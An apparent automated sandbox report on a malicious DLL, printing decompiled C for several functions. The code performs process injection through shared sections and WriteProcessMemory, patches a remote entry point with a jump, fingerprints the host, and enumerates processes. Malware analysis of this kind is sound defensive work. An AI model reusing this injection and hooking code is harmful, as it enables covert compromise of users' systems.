API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: 7432552202618214ff09496dd892babb79cb5ed6e1a56431ae5e527e25d11dc9
Instruction ID: 2b5b3560eca2b9c66e54fa8514e9480b8e1ea27dea2e81419eb01e222fcba38a
Opcode Fuzzy Hash: 7432552202618214ff09496dd892babb79cb5ed6e1a56431ae5e527e25d11dc9
Instruction Fuzzy Hash: C831A6716053419FE744FF64EC89EAE77A4EB55390B00456EF9018B2A3DA38DC04CB72

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 2912 Parent PID: 1584 regsvr32.exeCOMMON

Executed Functions

Function 1000C6C0, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200
nativeregistrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000C6C0(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				void* _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* _t69;
				intOrPtr _t75;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct _EXCEPTION_RECORD _t116;
				void* _t126;
				void* _t131;
				intOrPtr _t134;
				void* _t140;
				void* _t141;

				_t69 =  *0x1001e688; // 0x7900590
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E1000E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x1001e780; // 0x797fbc8
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						NtClose(_v16);
					}
					return _v8;
				}
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
					if(_t106 != 0) {
						DestroyWindow(_t106); // executed
						UnregisterClassA( &_v56, 0);
					}
				}
				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_t126 = _v20;
					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
						goto L12;
					}
					_t140 = E10008669( *0x1001e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E1000861A( &_v32, 0x1ac4);
					_t141 =  *0x1001e688; // 0x7900590
					 *0x1001e688 = _t131;
					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E1000C63F(_v12, _v8, _v36);
					 *0x1001e688 = _t141;
					goto L14;
				}
			}

APIs

NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
RegisterClassExA.USER32 ref: 1000C785
CreateWindowExA.USER32 ref: 1000C7B0
DestroyWindow.USER32 ref: 1000C7BB
UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
NtClose.NTDLL(00000000), ref: 1000C8F5

Strings

sadccdcdsasa, xrefs: 1000C73E
cdcdwqwqwq, xrefs: 1000C76A
0, xrefs: 1000C74D

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 2002808388-2319545179
Opcode ID: d9b7306b822ef4c75abda3a87e59d709b369751e76082ecbaf1197e7706a0768
Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
Opcode Fuzzy Hash: d9b7306b822ef4c75abda3a87e59d709b369751e76082ecbaf1197e7706a0768
Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB77, Relevance: 7.6, APIs: 5, Instructions: 105
nativeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				void* _v568;
				void _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t43;
				void* _t63;
				long _t65;
				void* _t70;
				void** _t73;
				void* _t74;

				_t73 = __edx;
				_t63 = __ecx;
				_t74 = 0;
				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
					_t74 = _t39;
					if(_t74 != 0) {
						memset( &_v744, 0, 0x2cc);
						_v744 = 0x10002;
						_push( &_v744);
						_t43 =  *0x1001e684; // 0x797faa0
						_push(_t73[1]);
						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
							_t70 = _v568;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t65 = 5;
							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
							_v8 = _t65;
							_v16 = _t70;
							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
								L6:
								_t74 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				_t32 =  *0x1001e77c; // 0x0
				if(_t32 != 0) {
					FreeLibrary(_t32);
					 *0x1001e77c =  *0x1001e77c & 0x00000000;
				}
				_t33 =  *0x1001e784; // 0x0
				if(_t33 != 0) {
					_t35 =  *0x1001e684; // 0x797faa0
					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
					E1000861A(0x1001e784, 0xfffffffe);
				}
				return _t74;
			}

APIs

Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605

FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73

Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6

memset.MSVCRT ref: 1000CBB8
NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
String ID:
API String ID: 317994034-0
Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90

Uniqueness

Uniqueness Score: -1.00%

Function 100030B7, Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100030B7() {
				int _t3;
				struct _SERVICE_TABLE_ENTRY* _t6;
				int* _t11;
				intOrPtr _t12;

				_t3 = E10008604(0x10);
				 *0x1001e71c = _t3;
				if(_t3 == 0) {
					L4:
					return _t3 | 0xffffffff;
				} else {
					_t3 = E10008604(0xa);
					_t11 =  *0x1001e71c; // 0x79236e0
					 *_t11 = _t3;
					if(_t3 == 0) {
						goto L4;
					} else {
						_t12 =  *0x1001e688; // 0x7900590
						E1000902D(1, _t3, 7, 8, _t12 + 0x648);
						_t6 =  *0x1001e71c; // 0x79236e0
						 *((intOrPtr*)(_t6 + 4)) = E10003052;
						_t3 = StartServiceCtrlDispatcherA(_t6);
						if(_t3 == 0) {
							goto L4;
						} else {
							return 0;
						}
					}
				}
			}

0x100030b9
0x100030be
0x100030c6
0x10003119
0x1000311c
0x100030c8
0x100030ca
0x100030d0
0x100030d6
0x100030da
0x00000000
0x100030dc
0x100030dc
0x100030f2
0x100030f7
0x100030ff
0x1000310c
0x10003114
0x00000000
0x10003116
0x10003118
0x10003118
0x10003114
0x100030da

APIs

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

StartServiceCtrlDispatcherA.ADVAPI32(079236E0), ref: 1000310C

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocCtrlDispatcherHeapServiceStart
String ID:
API String ID: 3270895466-0
Opcode ID: 8e36714de1a88bfbba535e0dee9b6efdb0d5928a7c2cdeb04c08aa71bf5ba524
Instruction ID: ac16b269da70e1785f3d8de3b20eaf3184fc588054e4d94b314cf4149a8ccc23
Opcode Fuzzy Hash: 8e36714de1a88bfbba535e0dee9b6efdb0d5928a7c2cdeb04c08aa71bf5ba524
Instruction Fuzzy Hash: 59F03AB42443428BF748CB74DC92B5A3398EB44394F55C128E615CB2D5EE75D8128A14

Uniqueness

Uniqueness Score: -1.00%

Function 1000D01F, Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000D01F(void* __fp0) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				short _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				void** _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				intOrPtr _t111;
				long _t115;
				signed int _t117;
				long _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				long _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x1001e69c; // 0x10000000
				_t81 = E10008604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x1001e684; // 0x797faa0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E1000BA05(); // executed
				 *(_t222 + 0x110) = _t88;
				_t178 =  *_t88;
				if(E1000BB8D( *_t88) == 0) {
					_t90 = E1000BA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220, executed
				_t91 = E1000E3F1(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
				_t92 = E1000E3B6(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
				 *(_t222 + 0x224) = _t162;
				_v12 = 0x80;
				_v8 = 0x100;
				_t22 = _t222 + 0x114; // 0x114
				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
					GetLastError();
				}
				_t97 =  *0x1001e694; // 0x797fbf8
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114, executed
				_t103 = E1000B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E1000B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E10008FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E1000B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess(); // executed
				_t111 = E1000BBDF(_t110); // executed
				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x1001e684; // 0x797faa0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E100095E1(_t199, 0x10c);
				_t200 =  *0x1001e684; // 0x797faa0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x1001e684; // 0x797faa0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E100085D5( &_v8);
				_t124 =  *0x1001e684; // 0x797faa0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E10009640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x1001e684; // 0x797faa0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x1001e684; // 0x797faa0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x1001e684; // 0x797faa0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x1001e684; // 0x797faa0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x1001e684; // 0x797faa0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x1001e684; // 0x797faa0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E100122D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
				_t145 = E1000CD33(_t79); // executed
				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
				return _t222;
			}

APIs

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

GetCurrentProcessId.KERNEL32 ref: 1000D046
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
GetCurrentProcess.KERNEL32 ref: 1000D09F
LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
GetLastError.KERNEL32 ref: 1000D13E
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
GetLastError.KERNEL32 ref: 1000D172
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
GetCurrentProcess.KERNEL32 ref: 1000D20E
memset.MSVCRT ref: 1000D229
GetVersionExA.KERNEL32(00000000), ref: 1000D234
GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
GetSystemInfo.KERNEL32(?), ref: 1000D26A
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287

Strings

%s\%s, xrefs: 1000D2F9
USERPROFILE, xrefs: 1000D2E4, 1000D312
TEMP, xrefs: 1000D328, 1000D333, 1000D344
SystemDrive, xrefs: 1000D353, 1000D35E, 1000D373
TEMP, xrefs: 1000D2F3

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AccountAllocByteCharDirectoryHeapInfoLookupMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 1775177207-2706916422
Opcode ID: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
Opcode Fuzzy Hash: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21

Uniqueness

Uniqueness Score: -1.00%

Function 10005F82, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				long _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				void* _t38;
				void* _t49;
				struct _SECURITY_ATTRIBUTES* _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq"); // executed
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E100085EF();
				_t19 = E1000980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E10008F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x1001e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E100095C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E100085C2( &_a8);
							_t53 =  &(_t53->nLength);
						} while (_t53 < 0x2710);
						E10012A5B( *0x1001e69c);
						 *_t55 = 0x7c3;
						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E100095E1(0x1001ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32); // executed
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E100085D5();
							_v8 = 0;
							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
							 *0x1001e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E100085D5();
					}
					goto L10;
				}
			}

APIs

OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
SetLastError.KERNEL32(000000AA), ref: 100060D7

Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8

Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839

GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
GetLastError.KERNEL32 ref: 10005FEF
memset.MSVCRT ref: 10006013
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
GetFileAttributesW.KERNEL32(00000000), ref: 10006083
CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7

Strings

Hello qqq, xrefs: 10005F8D

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
String ID: Hello qqq
API String ID: 3435743081-3610097158
Opcode ID: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
Opcode Fuzzy Hash: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21

Uniqueness

Uniqueness Score: -1.00%

Function 1000B7A8, Relevance: 9.1, APIs: 6, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E100095E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E100085D5( &_v16);
				_t33 = E1000C392(_t43);
				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E1000C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
			}

APIs

memset.MSVCRT ref: 1000B7C5
GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821

Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D

lstrcatW.KERNEL32 ref: 1000B85A
CharUpperBuffW.USER32(?,00000000), ref: 1000B86C

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 3410906232-0
Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000ABA3, Relevance: 7.6, APIs: 5, Instructions: 65
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000ABA3(intOrPtr __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				signed int _t14;
				signed int _t15;
				void* _t22;
				intOrPtr _t28;
				void* _t31;
				intOrPtr _t33;
				void* _t40;
				void* _t42;

				_t33 = __ecx;
				_t31 = __edx; // executed
				_t14 = CreateToolhelp32Snapshot(2, 0);
				_t42 = _t14;
				_t15 = _t14 | 0xffffffff;
				if(_t42 != _t15) {
					memset( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t42,  &_v304) != 0) {
						while(1) {
							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
							_t40 = _t22;
							if(_t40 == 0) {
								break;
							}
							_t33 =  *0x1001e684; // 0x797faa0
							if(Process32Next(_t42,  &_v308) != 0) {
								continue;
							}
							break;
						}
						CloseHandle(_t42);
						_t15 = 0 | _t40 == 0x00000000;
					} else {
						_t28 =  *0x1001e684; // 0x797faa0
						 *((intOrPtr*)(_t28 + 0x30))(_t42);
						_t15 = 0xfffffffe;
					}
				}
				return _t15;
			}

APIs

